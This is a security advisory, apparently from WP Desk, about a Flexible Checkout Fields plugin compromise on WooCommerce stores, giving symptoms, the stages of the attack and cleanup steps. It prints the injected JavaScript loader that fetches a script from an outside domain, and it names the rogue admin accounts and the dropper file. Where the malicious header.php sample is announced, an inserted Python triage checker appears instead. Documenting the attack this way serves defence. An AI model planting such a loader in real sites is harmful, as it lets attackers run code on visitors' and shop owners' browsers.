We have discovered a vulnerability in the free version of Flexible Checkout Fields. Fortunately, the source of the security breach was quickly identified and we developed a fix, released as the 2.3.4 update. Read this article to find out how to proceed in case of an infection and how to make sure your store is safe.
Today we were notified about a possible security breach related to an indirect use of our free Flexible Checkout Fields plugin, available in the WordPress repository. The data we gathered led us to conclude that it was apparently being used by another, separate plugin working in the background which had been creating additional admin accounts.
With the help of the WordPress community, we quickly identified the source of the problem and developed the appropriate vulnerability fix in less than an hour. The situation is now fully under control and the free Flexible Checkout Fields plugin is no longer a threat. The 2.3.4 update we have just released prevents the reuse of the security breach method described above.
Site infection symptoms:
- the appearance of new admin accounts that you did not create yourself
- the appearance of new plugins on the plugins list that you did not personally install
- suspicious files, especially ones with .php or .zip extensions (e.g. Woo-Add-To-Carts.zip), placed in the /wp-content/uploads/ directory
- rearrangement of the checkout fields, their unusual or faulty functioning, or the appearance of new fields that had not been previously added
- automatic redirections after moving to the checkout
Even if you haven't noticed any suspicious activity on your website, it is highly advisable to take additional measures to eliminate the possible effects of the aforementioned vulnerability and restore the appropriate level of security. Update the free version of the Flexible Checkout Fields plugin to at least version 2.3.4 and follow the instructions below to make sure your shop hasn't been infected.
Update #3
We have just released the 2.4.12 update, which includes additional security changes. It is based on a security audit performed by WPmagus. The changes were made mainly to adapt the plugin to the new guidelines and make it even more secure.
Update #2 (8:00 PM)
We have just released the 2.3.4 update, which prevents the infection from spreading if stage 1 has already happened. Learn more about how the infection works →
- Update the plugin before taking any further actions!
- After the free Flexible Checkout Fields plugin has been updated to the 2.3.4 release, go to the plugin settings (WooCommerce → Checkout Fields) and check whether any new fields have appeared there. If so, delete them.
- Please also make sure that the infection on your shop hasn't already reached stage 2, i.e. that no additional admin accounts have been created and the Woo-Add-To-Carts plugin hasn't been installed.
Update #1 (4:50 PM)
We have figured out exactly how the infection works. Knowing this, we will be able to prepare a plugin update which will prevent the attack from going further even if it has already reached stage 1.
How does the infection work?
Stage 1
By exploiting the vulnerability, two custom fields are added in two different sections, e.g. Billing and Shipping. After they have been created, the following script is injected in two different ways:

```javascript
// Loader stored inside the injected checkout-field definitions, as reproduced
// in this post (the URL is kept exactly as printed above).
var script_tag = document.createElement('script');
script_tag.setAttribute('src', 'https: //umbriawalking.com/counter/pixel.js');
document.head.appendChild(script_tag);
```

If this succeeds, the infection can enter stage 2.
Stage 2
To complete the procedure, the site admin has to visit the plugin configuration screen (WooCommerce → Checkout Fields) or the checkout page.
Then the following admin accounts are created:
wptest_dev1: wptest_dev2@yahoom.com
wptest_dev2: wptest_dev1@yahoom.com
woo_developdevacc: woo_developdevacc@yahoom.com
developer_test_user: developer_test_user@example.com
The Woo-Add-To-Carts.zip file is then downloaded, placed in the /wp-content/uploads/2020/02/ directory and installed using the default WordPress mechanisms, which extracts its .php files to /wp-content/plugins/Woo-Add-To-Carts/. After that it is visible on the installed plugins list and is treated as a standard WordPress plugin called Woo-Add-To-Carts.
In some cases you may also experience automatic redirections to URLs such as collectfasttracks(dot)com after moving to the checkout, or even already on the homepage.
If you notice any of the symptoms matching the description above, it is highly probable that your site has been infected. Please proceed according to the following instructions:
What to do if your WooCommerce site has been infected?
- Update the free Flexible Checkout Fields plugin to at least its 2.3.4 release
- Delete all unnecessary admin accounts, especially the ones below:
wptest_dev1: wptest_dev2@yahoom.com
wptest_dev2: wptest_dev1@yahoom.com
woo_developdevacc: woo_developdevacc@yahoom.com
developer_test_user: developer_test_user@example.com
- Make sure that no other unknown admin accounts have been added. If so, delete them as well.
- Delete the Woo-Add-To-Carts.zip file from the /wp-content/uploads/2020/02/ directory
- Verify whether there are any other suspicious files in the /wp-content/uploads/ directory.
- Delete the Woo-Add-To-Carts plugin from the installed plugins list, and the /wp-content/plugins/Woo-Add-To-Carts/ folder if it still exists
- Make sure there are no unidentified plugins on the list that you have not personally installed
- Check whether any new fields have appeared on the plugin configuration screen (WooCommerce → Checkout Fields). If so, delete them. Please also check that the already existing ones have not been modified in any way.
- If admin accounts are still being added, reset the Flexible Checkout Fields settings to default in every fields' section in accordance with the instructions below.
- If you are still being redirected after opening the homepage or moving to the checkout, please check whether malicious code has been added to the header.php file of the theme you are currently using (/wp-content/themes/name-of-your-theme/header.php). If you find it, delete it, save the changes and upload the modified file back via FTP.
It is usually placed right at the beginning of the header.php file and looks this way or similar:
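To make the checks above repeatable, here is an added triage script (not WP Desk's code) that tests a WordPress install tree and an exported administrator list against the indicators this post describes: the rogue usernames, .php/.zip files under uploads, the Woo-Add-To-Carts plugin directory, and script markers inside the stored checkout-field settings. The option name inspire_checkout_fields_settings and the `wp user list` command line are assumptions; all sample data is constructed.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post above (usernames, file and plugin names).
ROGUE_ADMINS = {"wptest_dev1", "wptest_dev2", "woo_developdevacc", "developer_test_user"}
ROGUE_PLUGIN_DIR = "Woo-Add-To-Carts"
# Stage-1 payload markers: a script tag or a createElement('script') loader
# stored inside a checkout-field definition (label, placeholder, etc.).
SCRIPT_RE = re.compile(r"<script\b|createElement\s*\(\s*['\"]script['\"]", re.I)

def rogue_admins(admin_csv):
    """admin_csv: CSV as printed by
    `wp user list --role=administrator --fields=user_login,user_email --format=csv`."""
    logins = {row.split(",", 1)[0].strip() for row in admin_csv.splitlines()[1:] if row.strip()}
    return sorted(logins & ROGUE_ADMINS)

def suspicious_uploads(wp_root):
    """Executable or archive files under wp-content/uploads (normally media only)."""
    uploads = Path(wp_root, "wp-content", "uploads")
    return sorted(p.relative_to(wp_root).as_posix() for p in uploads.rglob("*")
                  if p.is_file() and p.suffix.lower() in (".php", ".zip"))

def rogue_plugin_present(wp_root):
    return Path(wp_root, "wp-content", "plugins", ROGUE_PLUGIN_DIR).is_dir()

def fields_carry_script(settings_blob):
    """settings_blob: the plugin's stored settings as text (assumed option name
    inspire_checkout_fields_settings; `wp option get inspire_checkout_fields_settings`)."""
    return bool(SCRIPT_RE.search(settings_blob))

# Constructed sample data mirroring the indicators described in the post.
SAMPLE_ADMIN_CSV = """user_login,user_email
shopowner,owner@example.com
wptest_dev2,wptest_dev1@yahoom.com
developer_test_user,developer_test_user@example.com
"""
SAMPLE_SETTINGS = "label: Billing note<script>var s=document.createElement('script');</script>"

def demo():
    """Builds a throwaway WordPress-like tree containing the indicators and returns all findings."""
    with tempfile.TemporaryDirectory() as root:
        month = Path(root, "wp-content", "uploads", "2020", "02")
        month.mkdir(parents=True)
        (month / "Woo-Add-To-Carts.zip").write_bytes(b"PK")   # constructed stub, not the real archive
        (month / "photo.jpg").write_bytes(b"\xff\xd8")         # benign media file, must not be flagged
        Path(root, "wp-content", "plugins", ROGUE_PLUGIN_DIR).mkdir(parents=True)
        return {"admins": rogue_admins(SAMPLE_ADMIN_CSV), "uploads": suspicious_uploads(root),
                "plugin": rogue_plugin_present(root), "fields": fields_carry_script(SAMPLE_SETTINGS)}

if __name__ == "__main__":
    print(demo())
```

Point the functions at your real WordPress root and at the output of the two WP-CLI commands to triage a live site; any non-empty or True result is an indicator to act on.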
Following all the above steps is sufficient to eliminate the source of the infection; however, to ensure even higher security you may take the precautions listed below.
If you have a backup of the site's files:
- Restore all of the site's files from a backup created before the problem occurred, making sure that all potentially infected files have been deleted.
- Update the free Flexible Checkout Fields plugin to at least its 2.3.4 release
- Restore the database from the backup (please note that some order data might be lost).
- Make sure you have followed all the necessary steps and deleted all the files/directories listed above.
If you do not have a backup of the site's database, or if you are unsure whether the additional fields have appeared:
- Reset the Flexible Checkout Fields settings to default in every fields' section. To do that, go to WooCommerce → Checkout Fields and click the Reset Section Settings link for each section. You can also reach the page by typing the following URL: /wp-admin/admin.php?page=inspire_checkout_fields_settings
- Reset Section Settings for the Billing section: /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_billing
- Reset Section Settings for the Shipping section: /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_shipping
- Reset Section Settings for the Order section: /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order
- Delete all unnecessary admin accounts, including the ones created by the infection
- Delete all suspicious plugins you have not installed yourself, especially the Woo-Add-To-Carts plugin.
- Check whether the header.php file of the theme you are currently using contains the malicious code
If you have followed all the instructions above and still have problems on your site, please contact us directly at help@wpdesk.net and provide us with as much detail as possible, including:
- A description of the problem, with information about what exactly happened to your site.
- The list of installed plugins and their versions (WooCommerce system status)